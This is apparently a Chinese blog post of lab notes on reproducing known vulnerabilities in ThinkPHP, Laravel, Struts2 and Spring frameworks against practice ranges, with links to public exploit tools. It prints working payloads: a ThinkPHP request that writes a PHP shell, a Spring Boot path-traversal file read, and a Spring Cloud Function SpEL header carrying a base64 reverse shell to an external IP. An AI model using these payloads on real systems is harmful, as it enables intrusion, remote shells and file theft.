当前位置: 首页 > news >正文

开发框架安全ThinkPHPLaravelSpringBootStruts2SpringCloud复现

news 2025/7/20 9:12:23

PHP-ThinkphpLaravel

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架

综合工具:武器库-Thinkphp专检(3-6版本)

如何判断是TP6框架开发的web程序,基于源码、路径、图标、基于报错可发现

dex.php?=xxx 

在其6.0.13版本及以前

/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php

图片

图片

2、版本5.X命令执行

其5.0.23以前的版本,5.0.22/5.1.29等

Laravel是一套简洁、优雅的PHP Web开发框架(PHP WebFramework)。

漏洞复现,这里php5.0.23附近的版本可以使用Think的一些工具进行梭哈

图片

图片

图片

CVE-2021-3129 RCE

Laravel<=8.4.2

https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

Java-Struct2Spring

ApacheStruts2是一个流行的开发Web应用框架,用于开发JavaEE应用

https://github.com/abc123info/Struts2VulsScanTools

特征是xxx.action之类的文件,直接上工具一键梭哈就行了,就不复现了,其实是vulhub环境除了问题,打不开,这里就偷个懒

图片

偷懒是不可能滴,这里开了一个vulfocus靶场来看一下

Spring-Core-RCE(CVE-2022-22965)

存在于Spring框架以及衍生的框架中,并JDK9.0及以上版本会受到影响

https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE

特征:

图片

直接getshell

图片

图片

SpringBoot目录遍历(CVE-2021-21234)vulfocus

Spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。

这里图标就是小树叶,然后看一下

图片

图片

参考:blog.csdn.net/weixin_43165012/article/details/121152482

/manage/log/view?filename=etc/group&base=../../../../../../

SpringCloudFunctionSpel表达式注入 CVE-2022-22963 vulhub

SpringCloudFunction提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。

3.0.0.RELEASE <=SpringCloudFunction<=3.2.2

参考:https://developer.aliyun.com/article/1160011

POST:/functionRouter

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")

SpringCloudGateway命令执行 (CVE-2022-22947)

参考:https://cloud.tencent.com/developer/article/2164533

SpringCloudGateway是Spring中的一个API网关。

SpringCloudGateway3.1.x <3.1.1

SpringCloudGateway3.0.x <3.0.7

其他旧的、不受支持的SpringCloudGateway 版本

监控配置不当利用:

见前面Actuator-heapdump利用讲解

这里开一个靶场

图片

这里开一个梭哈工具

图片

ok,这里就已经在跑了

图片

来试一下有没有什么说法,这个工具需要配合jndi来打,只需要把jdni服务器输入里面

图片

图片

综合CVE利用工具:

https://github.com/0x727/SpringBootExploit

https://github.com/13exp/SpringBoot-Scan-GUI

#Python-FlaskDjango

http://www.lryc.cn/news/593337.html

相关文章:

  • SLAM中的非线性优化-2D图优化之激光SLAM基于优化的前端匹配(十八)
  • KVM中使用桥接模式.运维就业技术教程
  • 零基础学习性能测试-linux服务器监控:CPU监控
  • 【RK3576】【Android14】USB开发调试
  • 《Spring Boot 插件化架构实战:从 SPI 到热插拔的三级跳》
  • Android14 SystemUI 启动流程(2)
  • Verilog *2* SPI-立创逻辑派G1测试-1
  • 软件警告弹窗与兼容性问题
  • 当OT遇见IT:Apache IoTDB如何用“时序空间一体化“破解工业物联网数据孤岛困局
  • FMEA-CP-PFD三位一体数字化闭环:汽车部件质量管控的速效引擎
  • XSS漏洞----基于Dom的xss
  • 动态规划算法的欢乐密码(三):简单多状态DP问题(上)
  • GA-BP遗传算法优化BP神经网络数据生成,采用SVM分类模型评估
  • RabbitMQ面试精讲 Day 3:Exchange类型与路由策略详解
  • PostgreSQL常用命令与工具指南
  • 发明专利怎么写,与学术文章异同点与注意事项
  • 从0开始学习R语言--Day51--PH检验
  • HAMR硬盘高温写入的可靠性问题
  • 数字图像处理(三:图像如果当作矩阵,那加减乘除处理了矩阵,那图像咋变):从LED冬奥会、奥运会及春晚等等大屏,到手机小屏,快来挖一挖里面都有什么
  • 我用Cursor,1周上线了一个虚拟资料流量主小程序技术选型
  • 图解系统-小林coding笔记
  • view和pure的区别
  • 电脑windows系统深度维护指南
  • Validation - Spring Boot项目中参数检验的利器
  • 前端开发技巧:浏览器模拟弱网络环境
  • 中间件安全攻防全解:从Tomcat到Weblogic反序列化漏洞介绍
  • 暑假--作业3
  • Redis的持久化-RDB
  • 关于个人博客系统的测试报告
  • 【2025最新】使用neo4j实现GraphRAG所需的向量检索